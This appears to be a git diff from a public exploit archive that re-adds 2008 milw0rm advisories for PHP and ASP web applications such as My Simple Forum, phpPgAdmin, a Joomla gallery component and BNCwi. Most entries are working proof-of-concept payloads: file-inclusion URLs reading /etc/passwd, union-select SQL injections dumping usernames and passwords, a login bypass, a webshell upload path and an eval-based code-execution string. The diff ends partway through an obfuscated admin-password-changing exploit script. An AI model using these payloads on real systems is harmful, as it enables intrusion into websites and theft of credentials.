+	require_once($phpbb_portal_path . 'includes/adm_portal_block.' . $phpEx);
+	include($phpbb_root_path . 'includes/functions_display.' . $phpEx);
+
+
+
+  [o] Exploit
+
+       http://localhost/[path]/portal/includes/portal_block.php?phpbb_root_path=[evilcode]
+       http://localhost/[path]/includes/acp/acp_lcxbbportal.php?phpbb_root_path=[evilcode]
+
+
+=============================================================================================================
+
+
+  [o] Greetz
+
+       MainHack BrotherHood [ http://serverisdown.org/blog/]
+       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
+       H312Y yooogy mousekill }^-^{ kaka11 martfella
+       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
+
+       GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]
+
+        
+=============================================================================================================
+
+# milw0rm.com [2008-12-04]
diff --git a/platforms/php/webapps/7342.txt b/platforms/php/webapps/7342.txt
index 9cc8c643d..336655def 100755
--- a/platforms/php/webapps/7342.txt
+++ b/platforms/php/webapps/7342.txt
@@ -1,29 +1,29 @@
-/*
-
-	$Id: mysimpleforum-3.0-lfi.txt,v 0.1 2008/12/04 23:03:00 cOndemned Exp $
-
-	My Simple Forum 3.0 (index.php action) Local File Inclusion Vulnerability
-	Bug discovered by cOndemned
-
-	Script download: http://drennansoft.com/index.php?action=download&id=1
-
-	Greetz: ZaBeaTy, str0ke, d2, TBH, Avantura
-
-*/
-
-
-Source of index.php:
-
-	49.	if(file_exists('site/'.$_GET['action'].'.php')) {
-	50.	include('site/'.$_GET['action'].'.php');
-	51.	} else {
-	
-	local file inclusion on line 50
-	
-
-Proof of concept:
-
-	http://[host]/[my_simple_forum_path]/index.php?action=../../../../../../../etc/passwd%00
-	http://[host]/[my_simple_forum_path]/index.php?action=../../../../[localfile]%00
-
-# milw0rm.com [2008-12-04]
+/*
+
+	$Id: mysimpleforum-3.0-lfi.txt,v 0.1 2008/12/04 23:03:00 cOndemned Exp $
+
+	My Simple Forum 3.0 (index.php action) Local File Inclusion Vulnerability
+	Bug discovered by cOndemned
+
+	Script download: http://drennansoft.com/index.php?action=download&id=1
+
+	Greetz: ZaBeaTy, str0ke, d2, TBH, Avantura
+
+*/
+
+
+Source of index.php:
+
+	49.	if(file_exists('site/'.$_GET['action'].'.php')) {
+	50.	include('site/'.$_GET['action'].'.php');
+	51.	} else {
+	
+	local file inclusion on line 50
+	
+
+Proof of concept:
+
+	http://[host]/[my_simple_forum_path]/index.php?action=../../../../../../../etc/passwd%00
+	http://[host]/[my_simple_forum_path]/index.php?action=../../../../[localfile]%00
+
+# milw0rm.com [2008-12-04]
diff --git a/platforms/php/webapps/7343.txt b/platforms/php/webapps/7343.txt
index 38c4b47b0..4792329a1 100755
--- a/platforms/php/webapps/7343.txt
+++ b/platforms/php/webapps/7343.txt
@@ -1,24 +1,24 @@
-#####################################################################################
-####                      Joomla Component mydyngallery                          ####
-#####################################################################################
-#                                                                                   #
-#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
-#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
-#Our Site : Http://IRCRASH.COM                                                      #
-#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi       #
-#####################################################################################
-#                                                                                   #
-#Download : http://mydyngallery.mon-cottenchy.fr                                    #
-#                                                                                   #
-#DORK : inurl:option=com_mydyngallery                                               #
-#                                                                                   #
-#####################################################################################
-#                                       [Bug]                                       #
-#                                                                                   #
-#http://Site/[joomla_path]/index.php?option=com_mydyngallery&directory=zzz'+union+select+0,1,2,concat(0x3C703E,username,0x7c,password,0x3C2F703E),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users/*
-#                                                                                   #
-#####################################################################################
-#                           Site : Http://IRCRASH.COM                               #
-###################################### TNX GOD ######################################
-
-# milw0rm.com [2008-12-04]
+#####################################################################################
+####                      Joomla Component mydyngallery                          ####
+#####################################################################################
+#                                                                                   #
+#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
+#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
+#Our Site : Http://IRCRASH.COM                                                      #
+#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi       #
+#####################################################################################
+#                                                                                   #
+#Download : http://mydyngallery.mon-cottenchy.fr                                    #
+#                                                                                   #
+#DORK : inurl:option=com_mydyngallery                                               #
+#                                                                                   #
+#####################################################################################
+#                                       [Bug]                                       #
+#                                                                                   #
+#http://Site/[joomla_path]/index.php?option=com_mydyngallery&directory=zzz'+union+select+0,1,2,concat(0x3C703E,username,0x7c,password,0x3C2F703E),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users/*
+#                                                                                   #
+#####################################################################################
+#                           Site : Http://IRCRASH.COM                               #
+###################################### TNX GOD ######################################
+
+# milw0rm.com [2008-12-04]
diff --git a/platforms/php/webapps/7344.txt b/platforms/php/webapps/7344.txt
index 0e1c35a12..63a3af45f 100755
--- a/platforms/php/webapps/7344.txt
+++ b/platforms/php/webapps/7344.txt
@@ -1,41 +1,41 @@
-  :::::::-.   ...    ::::::.    :::.
-   ;;,   `';, ;;     ;;;`;;;;,  `;;;
-   `[[     [[[['     [[[  [[[[[. '[[
-    $$,    $$$$      $$$  $$$ "Y$c$$
-    888_,o8P'88    .d888  888    Y88
-    MMMMP"`   "YmmMMMM""  MMM     YM
-
-   [ Discovered by dun \ dun[at]strcpy.pl ]
-
- #####################################################
- #  [ gravity-gtd <= 0.4.5 ]  LFI/RCE Vulnerability  #
- #####################################################
- #
- # Script: An open source list manager for tracking action items according to the principles of Getting Things Done (GTD).
- #
- # Download: http://sourceforge.net/projects/gravity-gtd/
- #
- # [LFI] Vuln: http://site.com/gravity/library/setup/rpc.php?objectname=/../../../../../../../../etc/passwd%00
- # [RCE] Vuln: http://site.com/gravity/library/setup/rpc.php?objectname=Xmenu();phpinfo();die
- #     
- # Bug: ./gravity-0.4.5/library/setup/rpc.php (lines: 15-20)
- #
- # ...
- #		$objectName = $_REQUEST['objectname'];
- #
- #
- #		include  ("../objects/class.".strtolower($objectName).".php");				// LFI
- #
- #		eval ('$instance = new '.$objectName.'();');								// RCE
- # ... 	 
- #
- #
- ###############################################
- # Greetz: D3m0n_DE * str0ke * and otherz..
- ###############################################
-
- [ dun / 2008 ] 
-
-*******************************************************************************************
-
-# milw0rm.com [2008-12-04]
+  :::::::-.   ...    ::::::.    :::.
+   ;;,   `';, ;;     ;;;`;;;;,  `;;;
+   `[[     [[[['     [[[  [[[[[. '[[
+    $$,    $$$$      $$$  $$$ "Y$c$$
+    888_,o8P'88    .d888  888    Y88
+    MMMMP"`   "YmmMMMM""  MMM     YM
+
+   [ Discovered by dun \ dun[at]strcpy.pl ]
+
+ #####################################################
+ #  [ gravity-gtd <= 0.4.5 ]  LFI/RCE Vulnerability  #
+ #####################################################
+ #
+ # Script: An open source list manager for tracking action items according to the principles of Getting Things Done (GTD).
+ #
+ # Download: http://sourceforge.net/projects/gravity-gtd/
+ #
+ # [LFI] Vuln: http://site.com/gravity/library/setup/rpc.php?objectname=/../../../../../../../../etc/passwd%00
+ # [RCE] Vuln: http://site.com/gravity/library/setup/rpc.php?objectname=Xmenu();phpinfo();die
+ #     
+ # Bug: ./gravity-0.4.5/library/setup/rpc.php (lines: 15-20)
+ #
+ # ...
+ #		$objectName = $_REQUEST['objectname'];
+ #
+ #
+ #		include  ("../objects/class.".strtolower($objectName).".php");				// LFI
+ #
+ #		eval ('$instance = new '.$objectName.'();');								// RCE
+ # ... 	 
+ #
+ #
+ ###############################################
+ # Greetz: D3m0n_DE * str0ke * and otherz..
+ ###############################################
+
+ [ dun / 2008 ] 
+
+*******************************************************************************************
+
+# milw0rm.com [2008-12-04]
diff --git a/platforms/php/webapps/7345.txt b/platforms/php/webapps/7345.txt
index dad067b24..1eeb9e186 100755
--- a/platforms/php/webapps/7345.txt
+++ b/platforms/php/webapps/7345.txt
@@ -1,69 +1,69 @@
-  :::::::-.   ...    ::::::.    :::.
-   ;;,   `';, ;;     ;;;`;;;;,  `;;;
-   `[[     [[[['     [[[  [[[[[. '[[
-    $$,    $$$$      $$$  $$$ "Y$c$$
-    888_,o8P'88    .d888  888    Y88
-    MMMMP"`   "YmmMMMM""  MMM     YM
-
-   [ Discovered by dun \ dun[at]strcpy.pl ]
-
- ###########################################################
- #  [ BNCwi <= 1.04 ]  Local File Inclusion Vulnerability  #
- ###########################################################
- #
- # Script: "BNCwi is a Open-Source webinterface for psyBNC. 
- #		    With it you easily can manage your Bouncer via a graphical interface."
- #
- # Download: http://sourceforge.net/projects/bncwi/
- #
- # [LFI] Vuln: http://site.com/bncwi/index.php
- #	
- # 	POST /bncwi/index.php HTTP/1.1
- #	
- #	Host: www.site.com
- #	User-Agent: Mozilla/5.0
- #	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- #	Accept-Language: pl,en-us;q=0.7,en;q=0.3
- #	Accept-Encoding: gzip,deflate
- #	Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
- #	Keep-Alive: 300
- #	Connection: keep-alive
- #	Content-Type: application/x-www-form-urlencoded
- #	Content-Length: 49
- #	
- #	newlanguage=../../../../../../../../etc/passwd%00
- #	
- #	HTTP/1.x 200 OK
- #	Date: Fri, 05 Dec 2008 01:27:15 GMT
- #	Server: Apache
- #	X-Powered-By: PHP/5.2.6-pl7-gentoo
- #	Keep-Alive: timeout=15, max=100
- #	Connection: Keep-Alive
- #	Transfer-Encoding: chunked
- #	Content-Type: text/html
- #     
- # Bug: ./bncwi-1.04/index.php (lines: 47-56)
- #
- # ...
- #	if(isset($_POST['newlanguage']))
- #	{
- #		setcookie("bncwi_language", $_POST['newlanguage'], time()+60*60*24*30);
- #		if($_SESSION['logedin'] == "1")
- #		{
- #			mysql_query("UPDATE `$table_customers` SET `language` = '$_POST[newlanguage]' WHERE `serverid` = $_SESSION[server_id] AND BINARY `login` = '$_SESSION[USER_LOGIN]' LIMIT 1;");
- #		}
- #		$_SESSION['language'] = $_POST['newlanguage'];
- #		include("lang_".$_POST['newlanguage'].".inc.php");								//LFI
- #	}
- # ... 	 
- #
- #
- ###############################################
- # Greetz: D3m0n_DE * str0ke * and otherz..
- ###############################################
-
- [ dun / 2008 ] 
-
-*******************************************************************************************
-
-# milw0rm.com [2008-12-04]
+  :::::::-.   ...    ::::::.    :::.
+   ;;,   `';, ;;     ;;;`;;;;,  `;;;
+   `[[     [[[['     [[[  [[[[[. '[[
+    $$,    $$$$      $$$  $$$ "Y$c$$
+    888_,o8P'88    .d888  888    Y88
+    MMMMP"`   "YmmMMMM""  MMM     YM
+
+   [ Discovered by dun \ dun[at]strcpy.pl ]
+
+ ###########################################################
+ #  [ BNCwi <= 1.04 ]  Local File Inclusion Vulnerability  #
+ ###########################################################
+ #
+ # Script: "BNCwi is a Open-Source webinterface for psyBNC. 
+ #		    With it you easily can manage your Bouncer via a graphical interface."
+ #
+ # Download: http://sourceforge.net/projects/bncwi/
+ #
+ # [LFI] Vuln: http://site.com/bncwi/index.php
+ #	
+ # 	POST /bncwi/index.php HTTP/1.1
+ #	
+ #	Host: www.site.com
+ #	User-Agent: Mozilla/5.0
+ #	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+ #	Accept-Language: pl,en-us;q=0.7,en;q=0.3
+ #	Accept-Encoding: gzip,deflate
+ #	Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
+ #	Keep-Alive: 300
+ #	Connection: keep-alive
+ #	Content-Type: application/x-www-form-urlencoded
+ #	Content-Length: 49
+ #	
+ #	newlanguage=../../../../../../../../etc/passwd%00
+ #	
+ #	HTTP/1.x 200 OK
+ #	Date: Fri, 05 Dec 2008 01:27:15 GMT
+ #	Server: Apache
+ #	X-Powered-By: PHP/5.2.6-pl7-gentoo
+ #	Keep-Alive: timeout=15, max=100
+ #	Connection: Keep-Alive
+ #	Transfer-Encoding: chunked
+ #	Content-Type: text/html
+ #     
+ # Bug: ./bncwi-1.04/index.php (lines: 47-56)
+ #
+ # ...
+ #	if(isset($_POST['newlanguage']))
+ #	{
+ #		setcookie("bncwi_language", $_POST['newlanguage'], time()+60*60*24*30);
+ #		if($_SESSION['logedin'] == "1")
+ #		{
+ #			mysql_query("UPDATE `$table_customers` SET `language` = '$_POST[newlanguage]' WHERE `serverid` = $_SESSION[server_id] AND BINARY `login` = '$_SESSION[USER_LOGIN]' LIMIT 1;");
+ #		}
+ #		$_SESSION['language'] = $_POST['newlanguage'];
+ #		include("lang_".$_POST['newlanguage'].".inc.php");								//LFI
+ #	}
+ # ... 	 
+ #
+ #
+ ###############################################
+ # Greetz: D3m0n_DE * str0ke * and otherz..
+ ###############################################
+
+ [ dun / 2008 ] 
+
+*******************************************************************************************
+
+# milw0rm.com [2008-12-04]
diff --git a/platforms/php/webapps/7346.txt b/platforms/php/webapps/7346.txt
index 189678d09..5bc981855 100755
--- a/platforms/php/webapps/7346.txt
+++ b/platforms/php/webapps/7346.txt
@@ -1,38 +1,38 @@
-================================================
-  Multiple Membership Script V 2.5 SQL Injection Vulnerability
-================================================
-  ,--^----------,--------,-----,-------^--,
-  | |||||||||   `--------'     |          O .. Gaza Hacker Team ..
-  `+---------------------------^----------|
-    `\_,-------, _________________________|
-      / XXXXXX /`|     /
-     / XXXXXX /  `\   /
-    / XXXXXX /\______(
-   / XXXXXX /          
-  / XXXXXX /
- (________(            
-  `------'
-
-AUTHOR : ViRuS_HaCkErS
-Email  : h8g@hotmail.com
-SITE   : gaza-hacker.com  & hacker.ps
-
-#####################################################
-#####################################################
----------
- Exploit
----------
-SQL Injection Vulnerability
-
-http://www.site.com/sitepage.php?id=-15+union+select+1,concat_ws(password,0x3a,username),3,4,5+from+affiliate_admin
-
-sitepage.php?id=-15+union+select+1,concat_ws(password,0x3a,username),3,4,5+from+affiliate_admin
-http://www.pricelesshost.com/mmsv2/sitepage.php?id=-15+union+select+1,concat_ws(password,0x3a,username),3,4,5+from+affiliate_admin
- 
-Login : http://www.site.com/admin
-
-#######################################################################################
-Gaza Hacker TeaM : Le0n &  Lito & cLAw & zero cod
-#######################################################################################
-
-# milw0rm.com [2008-12-05]
+================================================
+  Multiple Membership Script V 2.5 SQL Injection Vulnerability
+================================================
+  ,--^----------,--------,-----,-------^--,
+  | |||||||||   `--------'     |          O .. Gaza Hacker Team ..
+  `+---------------------------^----------|
+    `\_,-------, _________________________|
+      / XXXXXX /`|     /
+     / XXXXXX /  `\   /
+    / XXXXXX /\______(
+   / XXXXXX /          
+  / XXXXXX /
+ (________(            
+  `------'
+
+AUTHOR : ViRuS_HaCkErS
+Email  : h8g@hotmail.com
+SITE   : gaza-hacker.com  & hacker.ps
+
+#####################################################
+#####################################################
+---------
+ Exploit
+---------
+SQL Injection Vulnerability
+
+http://www.site.com/sitepage.php?id=-15+union+select+1,concat_ws(password,0x3a,username),3,4,5+from+affiliate_admin
+
+sitepage.php?id=-15+union+select+1,concat_ws(password,0x3a,username),3,4,5+from+affiliate_admin
+http://www.pricelesshost.com/mmsv2/sitepage.php?id=-15+union+select+1,concat_ws(password,0x3a,username),3,4,5+from+affiliate_admin
+ 
+Login : http://www.site.com/admin
+
+#######################################################################################
+Gaza Hacker TeaM : Le0n &  Lito & cLAw & zero cod
+#######################################################################################
+
+# milw0rm.com [2008-12-05]
diff --git a/platforms/php/webapps/7351.txt b/platforms/php/webapps/7351.txt
index 3cce8c188..e40bc3986 100755
--- a/platforms/php/webapps/7351.txt
+++ b/platforms/php/webapps/7351.txt
@@ -1,36 +1,36 @@
-###########################################################################
-#-----------------------------OffensiveTrack------------------------------#
-###########################################################################
-
-
----------------------------- Tunisian Muslim ------------------------------
-
-#found by : OffensiveTrack
-#Author   : AlpHaNiX
-#website  : www.offensivetrack.org
-
-#contact  : AlpHa[AT]HACKER[DOT]BZ
-
-###########################################################################
-
-#script   : NightFall
-#download : http://iwrite.brinkster.net/nightfall.zip
-
-
-
-#Exploits :
-
---=[XSS]=--
-in the login page /login.asp write in the login fields your evil codes
-
-
---=[Database Disclosure]=--
-http://target.com/db/users-zza21.mdb
-
-
-
-#special thanks for syst3m and crimeirc staff
-
-###########################################################################
-
-# milw0rm.com [2008-12-05]
+###########################################################################
+#-----------------------------OffensiveTrack------------------------------#
+###########################################################################
+
+
+---------------------------- Tunisian Muslim ------------------------------
+
+#found by : OffensiveTrack
+#Author   : AlpHaNiX
+#website  : www.offensivetrack.org
+
+#contact  : AlpHa[AT]HACKER[DOT]BZ
+
+###########################################################################
+
+#script   : NightFall
+#download : http://iwrite.brinkster.net/nightfall.zip
+
+
+
+#Exploits :
+
+--=[XSS]=--
+in the login page /login.asp write in the login fields your evil codes
+
+
+--=[Database Disclosure]=--
+http://target.com/db/users-zza21.mdb
+
+
+
+#special thanks for syst3m and crimeirc staff
+
+###########################################################################
+
+# milw0rm.com [2008-12-05]
diff --git a/platforms/php/webapps/7352.txt b/platforms/php/webapps/7352.txt
index 98cd9d482..22dcf395c 100755
--- a/platforms/php/webapps/7352.txt
+++ b/platforms/php/webapps/7352.txt
@@ -1,31 +1,31 @@
-[~] Merlix Teamworx Server DD/Bypass Multiple Remote Vuln.
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~] -----------------------------------------------------------
-
-
-exp for demo: ( DD )
-
-http://demo.merlix.com/teamworx/teamworx.mdb
-
-exp for demo: ( Bypass )
-
-http://demo.merlix.com/teamworx/default.asp
-
-user: ZoRLu ( or dont write anything )
-
-passwd: ' or '
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke 
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-12-05]
+[~] Merlix Teamworx Server DD/Bypass Multiple Remote Vuln.
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~] -----------------------------------------------------------
+
+
+exp for demo: ( DD )
+
+http://demo.merlix.com/teamworx/teamworx.mdb
+
+exp for demo: ( Bypass )
+
+http://demo.merlix.com/teamworx/default.asp
+
+user: ZoRLu ( or dont write anything )
+
+passwd: ' or '
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke 
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-12-05]
diff --git a/platforms/php/webapps/7354.txt b/platforms/php/webapps/7354.txt
index b714af6ae..38f5fb86f 100755
--- a/platforms/php/webapps/7354.txt
+++ b/platforms/php/webapps/7354.txt
@@ -1,22 +1,22 @@
-****(remote file upload)****
-
-script: tizag-countdown_Version_3
-                   
-***************************************************************************
-download from:http://www.tizag.com/downloads/tizag-countdown_Version_3.zip
-                                                                                                         
-***************************************************************************
-www.site.com/path/index.php (upload file.php)
-
-shell= www.site.com/path/pics/file.php
-                          
-***************************************************
-
-
-Author: ahmadbady 
-
-my mail: kivi_hacker666@yahoo.com
-
-***************************************************
-
-# milw0rm.com [2008-12-05]
+****(remote file upload)****
+
+script: tizag-countdown_Version_3
+                   
+***************************************************************************
+download from:http://www.tizag.com/downloads/tizag-countdown_Version_3.zip
+                                                                                                         
+***************************************************************************
+www.site.com/path/index.php (upload file.php)
+
+shell= www.site.com/path/pics/file.php
+                          
+***************************************************
+
+
+Author: ahmadbady 
+
+my mail: kivi_hacker666@yahoo.com
+
+***************************************************
+
+# milw0rm.com [2008-12-05]
diff --git a/platforms/php/webapps/7363.txt b/platforms/php/webapps/7363.txt
index a63535540..4a5c40e6d 100755
--- a/platforms/php/webapps/7363.txt
+++ b/platforms/php/webapps/7363.txt
@@ -1,84 +1,84 @@
-  :::::::-.   ...    ::::::.    :::.
-   ;;,   `';, ;;     ;;;`;;;;,  `;;;
-   `[[     [[[['     [[[  [[[[[. '[[
-    $$,    $$$$      $$$  $$$ "Y$c$$
-    888_,o8P'88    .d888  888    Y88
-    MMMMP"`   "YmmMMMM""  MMM     YM
-
-   [ Discovered by dun \ dun[at]strcpy.pl ]
-
- ##################################################################
- #  [ phpPgAdmin <= 4.2.1 ]  Local File Inclusion Vulnerability   #
- ##################################################################
- #
- # Script: "phpPgAdmin is a web-based administration tool for PostgreSQL. It is perfect for PostgreSQL DBAs, newbies and hosting services."
- #
- # Script site: http://www.phppgadmin.org/
- # Download: http://phppgadmin.sourceforge.net/?page=download
- #
- # Vuln: http://site.com/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00
- #
- # Bug: ./phpPgAdmin-4.2.1/index.php (line: 11)
- #
- # ...
- #	include_once('./libraries/lib.inc.php');
- # ... 	 
- #
- #
- # Bug: ./phpPgAdmin-4.2.1/libraries/lib.inc.php (lines: 22-138 -> 136)
- #
- # ...
- #	// Determine language file to import:
- #	// 1. Check for the language from a request var
- #	if (isset($_REQUEST['language']) && isset($appLangFiles[$_REQUEST['language']]))
- #		$_language = $_REQUEST['language']; 
- #
- #	// 2. Check for language session var
- #	if (!isset($_language) && isset($_SESSION['webdbLanguage']) && isset($appLangFiles[$_SESSION['webdbLanguage']])) {
- #		$_language = $_SESSION['webdbLanguage'];
- #	}
- #
- #	// 3. Check for acceptable languages in HTTP_ACCEPT_LANGUAGE var
- #	if (!isset($_language) && $conf['default_lang'] == 'auto' && isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) {
- #		// extract acceptable language tags
- #		// (http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.4)
- #		preg_match_all('/\s*([a-z]{1,8}(?:-[a-z]{1,8})*)(?:;q=([01](?:.[0-9]{0,3})?))?\s*(?:,|$)/', strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']), $_m, PREG_SET_ORDER);
- #		foreach($_m as $_l) {  // $_l[1] = language tag, [2] = quality
- #			if (!isset($_l[2])) $_l[2] = 1;  // Default quality to 1
- #			if ($_l[2] > 0 && $_l[2] <= 1 && isset($availableLanguages[$_l[1]])) {
- #				// Build up array of (quality => language_file)
- #				$_acceptLang[$_l[2]] = $availableLanguages[$_l[1]];
- #			}
- #		}
- #		unset($_m);
- #		unset($_l);
- #		if (isset($_acceptLang)) {
- #			// Sort acceptable languages by quality
- #			krsort($_acceptLang, SORT_NUMERIC);
- #			$_language = reset($_acceptLang);
- #			unset($_acceptLang);
- #		}
- #	} 
- #
- #	// 4. Otherwise resort to the default set in the config file
- #	if (!isset($_language) && $conf['default_lang'] != 'auto' && isset($appLangFiles[$conf['default_lang']])) {
- #		$_language = $conf['default_lang'];
- #	}
- #
- #	// Import the language file
- #	if (isset($_language)) {
- #		include("./lang/recoded/{$_language}.php");									// * LFI *
- #		$_SESSION['webdbLanguage'] = $_language;
- #	}
- # ... 	 
- #
- #
- ###############################################
- # Greetz: D3m0n_DE * str0ke * and otherz..
- ###############################################
-
- [ dun / 2008 ] 
-
-*******************************************************************************************
-
-# milw0rm.com [2008-12-06]
+  :::::::-.   ...    ::::::.    :::.
+   ;;,   `';, ;;     ;;;`;;;;,  `;;;
+   `[[     [[[['     [[[  [[[[[. '[[
+    $$,    $$$$      $$$  $$$ "Y$c$$
+    888_,o8P'88    .d888  888    Y88
+    MMMMP"`   "YmmMMMM""  MMM     YM
+
+   [ Discovered by dun \ dun[at]strcpy.pl ]
+
+ ##################################################################
+ #  [ phpPgAdmin <= 4.2.1 ]  Local File Inclusion Vulnerability   #
+ ##################################################################
+ #
+ # Script: "phpPgAdmin is a web-based administration tool for PostgreSQL. It is perfect for PostgreSQL DBAs, newbies and hosting services."
+ #
+ # Script site: http://www.phppgadmin.org/
+ # Download: http://phppgadmin.sourceforge.net/?page=download
+ #
+ # Vuln: http://site.com/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00
+ #
+ # Bug: ./phpPgAdmin-4.2.1/index.php (line: 11)
+ #
+ # ...
+ #	include_once('./libraries/lib.inc.php');
+ # ... 	 
+ #
+ #
+ # Bug: ./phpPgAdmin-4.2.1/libraries/lib.inc.php (lines: 22-138 -> 136)
+ #
+ # ...
+ #	// Determine language file to import:
+ #	// 1. Check for the language from a request var
+ #	if (isset($_REQUEST['language']) && isset($appLangFiles[$_REQUEST['language']]))
+ #		$_language = $_REQUEST['language']; 
+ #
+ #	// 2. Check for language session var
+ #	if (!isset($_language) && isset($_SESSION['webdbLanguage']) && isset($appLangFiles[$_SESSION['webdbLanguage']])) {
+ #		$_language = $_SESSION['webdbLanguage'];
+ #	}
+ #
+ #	// 3. Check for acceptable languages in HTTP_ACCEPT_LANGUAGE var
+ #	if (!isset($_language) && $conf['default_lang'] == 'auto' && isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) {
+ #		// extract acceptable language tags
+ #		// (http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.4)
+ #		preg_match_all('/\s*([a-z]{1,8}(?:-[a-z]{1,8})*)(?:;q=([01](?:.[0-9]{0,3})?))?\s*(?:,|$)/', strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']), $_m, PREG_SET_ORDER);
+ #		foreach($_m as $_l) {  // $_l[1] = language tag, [2] = quality
+ #			if (!isset($_l[2])) $_l[2] = 1;  // Default quality to 1
+ #			if ($_l[2] > 0 && $_l[2] <= 1 && isset($availableLanguages[$_l[1]])) {
+ #				// Build up array of (quality => language_file)
+ #				$_acceptLang[$_l[2]] = $availableLanguages[$_l[1]];
+ #			}
+ #		}
+ #		unset($_m);
+ #		unset($_l);
+ #		if (isset($_acceptLang)) {
+ #			// Sort acceptable languages by quality
+ #			krsort($_acceptLang, SORT_NUMERIC);
+ #			$_language = reset($_acceptLang);
+ #			unset($_acceptLang);
+ #		}
+ #	} 
+ #
+ #	// 4. Otherwise resort to the default set in the config file
+ #	if (!isset($_language) && $conf['default_lang'] != 'auto' && isset($appLangFiles[$conf['default_lang']])) {
+ #		$_language = $conf['default_lang'];
+ #	}
+ #
+ #	// Import the language file
+ #	if (isset($_language)) {
+ #		include("./lang/recoded/{$_language}.php");									// * LFI *
+ #		$_SESSION['webdbLanguage'] = $_language;
+ #	}
+ # ... 	 
+ #
+ #
+ ###############################################
+ # Greetz: D3m0n_DE * str0ke * and otherz..
+ ###############################################
+
+ [ dun / 2008 ] 
+
+*******************************************************************************************
+
+# milw0rm.com [2008-12-06]
diff --git a/platforms/php/webapps/7365.php b/platforms/php/webapps/7365.php
index f3caa8cba..726ffe4ac 100755
--- a/platforms/php/webapps/7365.php
+++ b/platforms/php/webapps/7365.php
@@ -1,106 +1,106 @@
-<?php
-/*
-==============================================================================
-                      _      _       _          _      _   _ 
-                     / \    | |     | |        / \    | | | |
-                    / _ \   | |     | |       / _ \   | |_| |
-                   / ___ \  | |___  | |___   / ___ \  |  _  |
-   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
-                                                             
-
-==============================================================================
-                      ____   _  _     _   _    ___    _  __
-                     / ___| | || |   | \ | |  / _ \  | |/ /
-                    | |  _  | || |_  |  \| | | | | | | ' / 
-                    | |_| | |__   _| | |\  | | |_| | | . \ 
-                     \____|    |_|   |_| \_|  \___/  |_|\_\
-
-==============================================================================
-	DL PayCart <= 1.34 Admin Password Changing Exploit
-==============================================================================
-
-	[»] Script:             [ DL PayCart ]
-	[»] Language:           [ PHP ]
-	[»] homepage:           [ http://www.dinkumsoft.net/ ]
-	[»] Type:               [ Commercial ]
-	[»] found-report:       [ 26.11.2008-02.12.2008 ]
-	[»] Founder.coder:      [ G4N0K <mail.ganok[at]gmail.com> ]
-
-===[ LIVE ]===
-
-	[»] removed...
-
-
-	
-===[ Greetz ]===
-
-	[»] ALLAH
-	[»] Tornado2800 <Tornado2800[at]gmail.com>
-	[»] B13
-	[»] AFSHIN-ZARBAT <afshin.zarbat[at]yahoo.com>
-	[»] QU1E <evilinhell87[at]yahoo.com>
-	[»] Hussain-X <darkangel_g85[at]yahoo.com>
-
-	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
-	//ALLAH,forgimme...
-*/
-
-error_reporting(E_ALL);
-	$G4N0K = "vVlJm6LKEv1BvWGyShZ3ISiQFKCgjDsgq5iV1yiIv/5FAlpadav6vvv66wUfmuYQw4mIE2ngGoeo".
-                 "X8w3yzNyVrS+NA9zZFsbk7YCe2UnoWIdI1EwHVvVt7aeoIxqNTq+mP28tSRrhaR0WIeWq5MuCnZc".
-                 "SaeYKanQ5U++27Ua5axRtshgHypeHlqNxSzuZ6zez9q4iltHQu2rnFKR2501yrItkeeGM5erI1bU".
-                 "NNobNZbLNqqkRqssKhDRDyLjJBcXuedTfKG+3F/fFbP1dtrzulZ20mDJGWJ+PgaelSI4HysL+CzR".
-                 "oefzqDDaaG+V0d48OkrZBVuU+Ax/wrJzwksqgzeHRf6AZbpZ90IeylIfMw61cRzbyigO9G03CfWy".
-                 "USyQ/VxuCktHkpC+2kYa781ks6QSfctdDFEQApmuo0wwfc+4YIbvA1FYwn6ngClPQS9Ir4rQRGBP".
-                 "pHSJdbHW+qqZa+y073CGQb265xIp1iyWbR6B3K+K2fqscUE56FipbaCUz6C3GlSgg0hXvgtnKsWT".
